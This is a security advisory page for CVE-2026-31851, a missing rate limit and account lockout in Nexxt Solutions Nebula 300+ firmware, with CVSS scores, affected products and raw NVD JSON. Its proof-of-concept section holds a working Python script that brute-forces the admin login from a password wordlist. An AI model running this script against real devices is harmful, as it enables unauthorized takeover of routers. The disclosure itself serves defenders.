Security Vulnerability Report
CVE-2026-31851 CVSS 9.8 CRITICAL

CVE-2026-31851

Published: 2026-03-23 13:16:31
Last Modified: 2026-04-29 17:37:36
Source: 309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c

Description

Nexxt Solutions Nebula 300+ firmware through version 12.01.01.37 does not implement rate limiting or account lockout mechanisms on authentication interfaces. An attacker can perform unlimited authentication attempts against endpoints that rely on credential validation, enabling brute-force attacks to guess administrative credentials without restriction.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL (NVD primary CVSS 3.1 assessment; the CNA's secondary CVSS 4.0 vector in the raw JSON below rates the same issue 7.7 HIGH with an adjacent attack vector and high attack complexity, so the two sources differ on exploitability)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:nexxtsolutions:nebula300plus_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nexxtsolutions:nebula300plus:-:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform entry in an AND configuration with the firmware CPE above; the weakness is tracked against the firmware, not the device hardware)
Nexxt Solutions Nebula 300+ firmware <= 12.01.01.37

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://<target_ip>/login" username = "admin" wordlist = "passwords.txt" # Headers to mimic a browser headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } def brute_force_login(): # Open the wordlist file with open(wordlist, 'r') as f: for password in f: password = password.strip() # Payload data payload = { "username": username, "password": password } try: # Send POST request to login endpoint response = requests.post(target_url, data=payload, headers=headers, timeout=5) # Check if login was successful (adjust condition based on response) if response.status_code == 200 and "dashboard" in response.text: print(f"[+] Success! Password found: {password}") return password else: print(f"[-] Failed attempt: {password}") except requests.RequestException as e: print(f"[!] Error connecting to target: {e}") break if __name__ == "__main__": brute_force_login()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31851", "sourceIdentifier": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "published": "2026-03-23T13:16:30.960", "lastModified": "2026-04-29T17:37:36.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nexxt Solutions Nebula 300+ firmware through version 12.01.01.37 does not implement rate limiting or account lockout mechanisms on authentication interfaces. An attacker can perform unlimited authentication attempts against endpoints that rely on credential validation, enabling brute-force attacks to guess administrative credentials without restriction."}, {"lang": "es", "value": "El firmware de Nexxt Solutions Nebula 300+ hasta la versión 12.01.01.37 no implementa limitación de tasa o bloqueo de cuenta en la interfaz de autenticación."}], "metrics": {"cvssMetricV40": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nexxtsolutions:nebula300plus_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "12.01.01.37", "matchCriteriaId": "D55E0FD8-9ADB-423B-A23F-64F41F9DD40B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nexxtsolutions:nebula300plus:-:*:*:*:*:*:*:*", "matchCriteriaId": "F9AA93D2-E1BA-4EFC-8760-BF366CF6474D"}]}]}], "references": [{"url": "https://nexxt-connectivity-frontend.s3.amazonaws.com/media/docs/Nebula300+_v12.01.01.37.zip", "source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "tags": ["Product"]}, {"url": "https://www.nexxtsolutions.com/connectivity/internal-products/ARN02304U6/", "source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "tags": ["Product"]}]}}